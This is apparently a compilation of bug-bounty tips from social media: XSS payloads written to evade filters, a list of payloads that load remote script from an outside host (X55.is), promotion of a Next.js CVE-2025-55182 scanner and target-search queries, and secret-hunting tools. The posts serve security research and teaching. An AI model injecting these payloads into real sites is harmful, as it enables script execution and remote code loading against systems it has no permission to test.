Another good payload <script ysx<>Reflect.apply(alert,null,[1])</script xy<> #xsspayload #bugbountytips

A very good xss payload. <sCriPt x>(((confirm)))``</scRipt x> #bugbountytips #xss #bugbounty

Want to learn complex xss attacks with practical for free? Then this post is for you! Hi everyone! I've added a new video in my xss playlist showing how i was able to find an interesting xss attack in NASA with full practical demonstration Check it out here:

I've developed a professional and technical tool for Next.js (CVE-2025-55182) 🥳 I'm offering this tool, which allows you to perform both bulk and individual scans, as well as testing on live subdomains. github; https://t.co/qMOoXmBJ9j #DevTools #python #bugbountytip

Reminder: React2Shell detection is live across Burp Suite. If you’re assessing exposure in Next.js apps, here’s how to run reliable checks with Burp Suite Professional or Burp Suite DAST: https://t.co/CEfFmAHAmj

🚨 POC for CVE-2025-55182 that works on Next.js 16.0.6 Here are the exact, battle-tested queries you need — Censys, Shodan, FOFA, ZoomEye, Quake, BinaryEdge, https://t.co/Hi5ulNT5FP, and Nuclei matchers — all tuned specifically to find Next.js RSC / React Server Components

Paste the data, and it will extract the domains. Not perfect, but useful for me. #bugbountytips #BugBounty https://t.co/zomFSIXz4Q

Just got a reward for a high vulnerability submitted on @yeswehack -- (XSS) - Stored (CWE-79). https://t.co/qUkEEJ1s6V #YesWeRHackers Steps: 1. Found misconfigured Algolia key 2. Escalate it into Stored XSS 3. Payload executed when searching for a specific keyword #bugbountytips

Bug Bounty Search Engine Google advanced search queries generator for target domain: File & Directory Discovery Vulnerabilities & Exploits Subdomain & Asset Discovery And lot more https://t.co/o2eM0dTIcr #InfoSec #BugBounty #bugbountytips #CyberSecurity

Add your keywords, and the extension will find them in HTML source code, the DOM, and JS files

Stop missing cache poisoning vulnerabilities. Most hunters only test X-Forwarded-Host and miss 90% of the attack surface. I wrote a complete guide to finding what others miss: https://t.co/rC44Keik5K #bugbounty #infosec

Secrets : It finds secrets using regax. You can define your own regax in the regax.txt file. Keywords : You can save keyword like "redirect=" , "JWT" , "aws_secrets" etc and extension will find it in all website pages, dom and js files.

🔍 Hunting secrets just got easier. Meet KeySec Hunter — a Chrome extension that scans websites for keywords & exposed secrets. 💡 Perfect for bug bounty hunters & devs. https://t.co/GwgxGMCBjr #BugBounty #bugbountytips

LLM-powered subdomain enumeration tool.⚔️ - https://t.co/AWGqaxZOKL #infosec #cybersec #bugbountytips

Everyone hunts for common bugs… but the real rewards often hide in the underrated ones. I’ve made a YouTube playlist — “Underrated Vulnerabilities” showing how to find impactful bugs most hackers miss. Practical. Real. Eye-opening. Watch here: https://t.co/Y2Kl3h2ist

Want to learn XSS from scratch and turn it into real, practical skills? I made a 23-video YouTube playlist that takes you from basic payloads to advanced XSS chains — with live target demos. Completely FREE. Watch the playlist https://t.co/tZMBKywYDu

Best Alternatives to alert(1) #XSS Payload 1. import('//X55.is') https://t.co/44PpUdSWrz 2. $.getScript('//X55.is') * https://t.co/nDsnfNDcMo 3. appendChild(createElement`script`).src='//X55.is' https://t.co/5u88Jwbwmc * requires jQuery loaded on DOM #hack2learn

@mijanhaque_ Check this out! It's a solid one, though, that I often use while hunting :) https://t.co/eGEMwMYocZ

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = https://t.co/4hiJXDNlmU #infosec #cybersec #bugbountytips

Escalated algolia key misconfiguration to stored xss.